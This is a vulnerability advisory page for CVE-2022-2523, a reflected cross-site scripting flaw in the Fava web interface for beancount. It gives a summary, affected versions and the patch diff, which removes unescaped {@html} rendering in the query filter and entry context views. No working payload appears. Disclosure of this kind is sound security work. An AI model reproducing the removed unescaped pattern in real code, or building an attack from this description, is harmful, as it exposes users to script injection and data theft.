Cross-site Scripting (XSS) - Reflected in beancount/fava
Description
Cross-site Scripting (XSS) - Reflected in GitHub repository beancount/fava prior to 1.22.2.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Reflected XSS in Fava prior to 1.22.2 allows attackers to inject arbitrary JavaScript via crafted query filter parameters.
Vulnerability
Description CVE-2022-2523 is a reflected Cross-Site Scripting (XSS) vulnerability in the beancount/fava application, affecting versions prior to 1.22.2. The root cause is improper sanitization of user input in the query filter functionality: the inventory data was rendered using {@html ...} without escaping, allowing unvalidated HTML or JavaScript to be injected [1][2].
Exploitation
The vulnerability is exploitable over the network with low attack complexity and no required privileges. An attacker can craft a malicious URL containing a query filter with embedded JavaScript. When a victim visits this URL, the script executes in the context of the Fava application, potentially leading to data theft, session hijacking, or unauthorized actions [1].
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser, compromising the confidentiality and integrity of user data. The CVSS v3.1 base score is 8.1 (High) [1].
Mitigation
The issue was fixed in commit dccfb6a2f4567f35ce2e9a78e24f92ebf946bc9b, and the fix is included in version 1.22.2. Users are strongly advised to upgrade to the latest version [3][4]. No workarounds are specified.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
favaPyPI | < 1.22.2 | 1.22.2 |
Affected products
3- beancount/beancount/favav5Range: unspecified
Patches
1dccfb6a2f456fix xss issue in query filter
2 files changed · +9 −3
frontend/src/modals/EntryContext.svelte+8 −2 modified@@ -35,7 +35,10 @@ <tr> <td><a href={urlForAccount(account)}>{account}</a></td> <td> - {@html inventory.join("<br>")} + {#each inventory as amount} + {amount} + <br /> + {/each} </td> </tr> {/each} @@ -52,7 +55,10 @@ <tr> <td><a href={urlForAccount(account)}>{account}</a></td> <td> - {@html inventory.join("<br>")} + {#each inventory as amount} + {amount} + <br /> + {/each} </td> </tr> {/each}
frontend/src/query/Query.svelte+1 −1 modified@@ -106,7 +106,7 @@ {/if} {@html result.table} {:else if error} - {@html error} + {error} {/if} </div> </details>
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-q8hg-3vqv-f8v3ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-2523ghsaADVISORY
- github.com/beancount/fava/commit/dccfb6a2f4567f35ce2e9a78e24f92ebf946bc9bghsax_refsource_MISCWEB
- github.com/pypa/advisory-database/tree/main/vulns/fava/PYSEC-2022-240.yamlghsaWEB
- huntr.dev/bounties/2a1802d8-1c2e-4919-96a7-d4dcf7ffcf8fghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.